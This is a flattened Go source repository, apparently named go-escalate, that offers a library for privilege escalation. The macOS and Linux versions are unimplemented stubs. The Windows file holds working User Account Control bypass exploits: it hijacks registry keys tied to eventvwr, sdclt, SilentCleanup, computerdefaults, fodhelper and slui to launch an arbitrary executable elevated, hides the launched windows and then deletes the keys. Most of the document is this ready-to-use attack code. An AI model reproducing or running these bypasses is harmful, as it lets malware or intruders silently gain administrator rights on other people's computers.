├── README.md ├── go.mod ├── go.sum ├── .gitignore ├── escalate_linux.go ├── escalate_darwin.go ├── LICENSE ├── util_windows.go └── escalate_windows.go /README.md: -------------------------------------------------------------------------------- 1 | # go-escalate 2 | The goal is to provide an easy to use API to escalate privileges on Linux, Windows and Mac OS 3 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/lu4p/go-escalate 2 | 3 | go 1.14 4 | 5 | require golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 6 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 h1:5B6i6EAiSYyejWfvc5Rc9BbI3rzIsrrXfAQBWnYfn+w= 2 | golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, build with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | -------------------------------------------------------------------------------- /escalate_linux.go: -------------------------------------------------------------------------------- 1 | package escalate 2 | 3 | import ( 4 | "errors" 5 | "log" 6 | ) 7 | 8 | // Escalate TODO: implement 9 | func Escalate(path string) error { 10 | log.Println("Path for bypass: (", path, ")") 11 | return errors.New("Not implemented yet") 12 | } 13 | -------------------------------------------------------------------------------- /escalate_darwin.go: -------------------------------------------------------------------------------- 1 | package escalate 2 | 3 | import ( 4 | "errors" 5 | "log" 6 | ) 7 | 8 | // Escalate // TODO: implement 9 | func Escalate(path string) error { 10 | log.Println("Path for bypass: (", path, ")") 11 | return errors.New("Not Implemented yet") 12 | } 13 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | This is free and unencumbered software released into the public domain. 2 | 3 | Anyone is free to copy, modify, publish, use, compile, sell, or 4 | distribute this software, either in source code form or as a compiled 5 | binary, for any purpose, commercial or non-commercial, and by any 6 | means. 7 | 8 | In jurisdictions that recognize copyright laws, the author or authors 9 | of this software dedicate any and all copyright interest in the 10 | software to the public domain. We make this dedication for the benefit 11 | of the public at large and to the detriment of our heirs and 12 | successors. We intend this dedication to be an overt act of 13 | relinquishment in perpetuity of all present and future rights to this 14 | software under copyright law. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR 20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 23 | 24 | For more information, please refer to 25 | -------------------------------------------------------------------------------- /util_windows.go: -------------------------------------------------------------------------------- 1 | package escalate 2 | 3 | import ( 4 | "bytes" 5 | "errors" 6 | "os" 7 | "os/exec" 8 | "strconv" 9 | "strings" 10 | ) 11 | 12 | // GetVer gets the major version of the current installed 13 | // Windows 14 | func GetVer() (int, error) { 15 | cmd := exec.Command("cmd", "ver") 16 | var out bytes.Buffer 17 | var stderr bytes.Buffer 18 | cmd.Stdout = &out 19 | cmd.Stderr = &stderr 20 | err := cmd.Run() 21 | if err != nil { 22 | return 0, err 23 | } 24 | osStr := strings.Replace(out.String(), "\n", "", -1) 25 | osStr = strings.Replace(osStr, "\r\n", "", -1) 26 | tmp1 := strings.Index(osStr, "[Version") 27 | tmp2 := strings.Index(osStr, "]") 28 | if tmp1 == -1 || tmp2 == -1 { 29 | return 0, errors.New("Version string has wrong format") 30 | } 31 | longVer := osStr[tmp1+9 : tmp2] 32 | majorVerStr := strings.SplitN(longVer, ".", 2)[0] 33 | majorVerInt, err := strconv.Atoi(majorVerStr) 34 | if err != nil { 35 | return 0, errors.New("Version could not be converted to int") 36 | } 37 | return majorVerInt, nil 38 | } 39 | 40 | // CheckElevate checks whether the current process has administrator 41 | // privileges 42 | func CheckElevate() bool { 43 | _, err := os.Open("\\\\.\\PHYSICALDRIVE0") 44 | if err != nil { 45 | return false 46 | } 47 | return true 48 | } 49 | -------------------------------------------------------------------------------- /escalate_windows.go: -------------------------------------------------------------------------------- 1 | package escalate 2 | 3 | import ( 4 | "errors" 5 | "log" 6 | "os/exec" 7 | "syscall" 8 | "time" 9 | 10 | "golang.org/x/sys/windows/registry" 11 | ) 12 | 13 | // Uacbypass bypasses User Account Control of Windows and escaletes 14 | // privileges to root if User has root privileges 15 | func Escalate(path string) (err error) { 16 | log.Println("Path for bypass: (", path, ")") 17 | version, err := GetVer() 18 | if err != nil { 19 | return 20 | } 21 | if version == 10 { 22 | if computerdefaults(path) == nil { 23 | log.Println("computerdefaults") 24 | return 25 | } 26 | if sdcltcontrol(path) == nil { 27 | log.Println("sdcltcontrol") 28 | return 29 | } 30 | if fodhelper(path) == nil { 31 | log.Println("fodhelper") 32 | return 33 | } 34 | } 35 | if version > 9 { 36 | if silentCleanUp(path) == nil { 37 | log.Println("silentCleanUp") 38 | return 39 | } 40 | if slui(path) == nil { 41 | log.Println("slui") 42 | return 43 | } 44 | } 45 | if version < 10 { 46 | if eventvwr(path) == nil { 47 | log.Println("eventvwr") 48 | return 49 | } 50 | } 51 | return errors.New("uac bypass failed") 52 | } 53 | 54 | //// TODO: cleanup Exploits 55 | 56 | // eventvwr works on 7, 8, 8.1 fixed in win 10 57 | func eventvwr(path string) (err error) { 58 | 59 | log.Println("eventvwr") 60 | key, _, err := registry.CreateKey( 61 | registry.CURRENT_USER, `Software\Classes\mscfile\shell\open\command`, 62 | registry.SET_VALUE|registry.ALL_ACCESS) 63 | if err != nil { 64 | return 65 | } 66 | err = key.SetStringValue("", path) 67 | if err != nil { 68 | return 69 | } 70 | err = key.Close() 71 | if err != nil { 72 | return 73 | } 74 | 75 | time.Sleep(2 * time.Second) 76 | var cmd = exec.Command("eventvwr.exe") 77 | err = cmd.Run() 78 | if err != nil { 79 | return 80 | } 81 | time.Sleep(5 * time.Second) 82 | registry.DeleteKey(registry.CURRENT_USER, `Software\Classes\mscfile`) 83 | return 84 | } 85 | 86 | // sdcltcontrol works on Win 10 87 | func sdcltcontrol(path string) error { 88 | 89 | log.Println("sdcltcontrol") 90 | var cmd *exec.Cmd 91 | 92 | key, _, err := registry.CreateKey( 93 | registry.CURRENT_USER, `Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe`, 94 | registry.SET_VALUE) 95 | if err != nil { 96 | return err 97 | } 98 | 99 | if err := key.SetStringValue("", path); err != nil { 100 | return err 101 | } 102 | 103 | if err := key.Close(); err != nil { 104 | return err 105 | } 106 | 107 | time.Sleep(2 * time.Second) 108 | 109 | cmd = exec.Command("cmd", "/C", "start sdclt.exe") 110 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 111 | _, err = cmd.Output() 112 | if err != nil { 113 | return err 114 | } 115 | time.Sleep(5 * time.Second) 116 | 117 | err = registry.DeleteKey(registry.CURRENT_USER, `Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe`) 118 | if err != nil { 119 | return err 120 | } 121 | 122 | return nil 123 | } 124 | 125 | // silentCleanUp works on Win 8.1, 10(patched on some Versions) even on UAC_ALWAYSnotify 126 | func silentCleanUp(path string) (err error) { 127 | 128 | log.Println("silentCleanUp") 129 | 130 | key, _, err := registry.CreateKey( 131 | registry.CURRENT_USER, `Environment`, 132 | registry.SET_VALUE) 133 | if err != nil { 134 | return 135 | } 136 | 137 | err = key.SetStringValue("windir", path) 138 | if err != nil { 139 | return 140 | } 141 | err = key.Close() 142 | if err != nil { 143 | return 144 | } 145 | time.Sleep(2 * time.Second) 146 | var cmd = exec.Command("cmd", "/C", "schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I") 147 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 148 | _, err = cmd.Output() 149 | if err != nil { 150 | return 151 | } 152 | delkey, _ := registry.OpenKey( 153 | registry.CURRENT_USER, `Environment`, 154 | registry.SET_VALUE) 155 | delkey.DeleteValue("windir") 156 | delkey.Close() 157 | return 158 | } 159 | 160 | // computerdefaults works on Win 10 is more reliable than fodhelper 161 | func computerdefaults(path string) (err error) { 162 | log.Println("computerdefaults") 163 | key, _, err := registry.CreateKey(registry.CURRENT_USER, `Software\Classes\ms-settings\shell\open\command`, registry.QUERY_VALUE|registry.SET_VALUE) 164 | 165 | if err != nil { 166 | return 167 | } 168 | err = key.SetStringValue("", path) 169 | if err != nil { 170 | return 171 | } 172 | err = key.SetStringValue("DelegateExecute", "") 173 | if err != nil { 174 | return 175 | } 176 | err = key.Close() 177 | if err != nil { 178 | return 179 | } 180 | time.Sleep(2 * time.Second) 181 | 182 | var cmd = exec.Command("cmd", "/C", "start computerdefaults.exe") 183 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 184 | _, err = cmd.Output() 185 | if err != nil { 186 | return 187 | } 188 | 189 | time.Sleep(5 * time.Second) 190 | registry.DeleteKey(registry.CURRENT_USER, `Software\Classes\ms-settings`) 191 | return 192 | } 193 | 194 | // fodhelper works on 10 but computerdefaults is more reliable 195 | func fodhelper(path string) (err error) { 196 | log.Println("fodhelper") 197 | 198 | key, _, err := registry.CreateKey( 199 | registry.CURRENT_USER, `Software\Classes\ms-settings\shell\open\command`, 200 | registry.SET_VALUE) 201 | if err != nil { 202 | return 203 | } 204 | err = key.SetStringValue("", path) 205 | if err != nil { 206 | return 207 | } 208 | err = key.SetStringValue("DelegeteExecute", "") 209 | if err != nil { 210 | return 211 | } 212 | err = key.Close() 213 | if err != nil { 214 | return 215 | } 216 | time.Sleep(2 * time.Second) 217 | 218 | var cmd = exec.Command("start fodhelper.exe") 219 | err = cmd.Run() 220 | if err != nil { 221 | return 222 | } 223 | time.Sleep(5 * time.Second) 224 | err = registry.DeleteKey(registry.CURRENT_USER, `Software\Classes\ms-settings\shell\open\command`) 225 | if err != nil { 226 | return 227 | } 228 | registry.DeleteKey(registry.CURRENT_USER, `Software\Classes\ms-settings`) 229 | return 230 | } 231 | 232 | // slui works on Win 8.1, 10 233 | func slui(path string) (err error) { 234 | log.Println("slui") 235 | 236 | key, _, err := registry.CreateKey( 237 | registry.CURRENT_USER, `Software\Classes\exefile\shell\open\command`, 238 | registry.SET_VALUE|registry.ALL_ACCESS) 239 | 240 | if err != nil { 241 | return 242 | } 243 | err = key.SetStringValue("", path) 244 | if err != nil { 245 | return 246 | } 247 | err = key.SetStringValue("DelegateExecute", "") 248 | if err != nil { 249 | return 250 | } 251 | err = key.Close() 252 | if err != nil { 253 | return 254 | } 255 | 256 | time.Sleep(2 * time.Second) 257 | 258 | var cmd = exec.Command("slui.exe") 259 | err = cmd.Run() 260 | if err != nil { 261 | return 262 | } 263 | time.Sleep(5 * time.Second) 264 | 265 | registry.DeleteKey(registry.CURRENT_USER, `Software\Classes\exefile\`) 266 | return 267 | } 268 | --------------------------------------------------------------------------------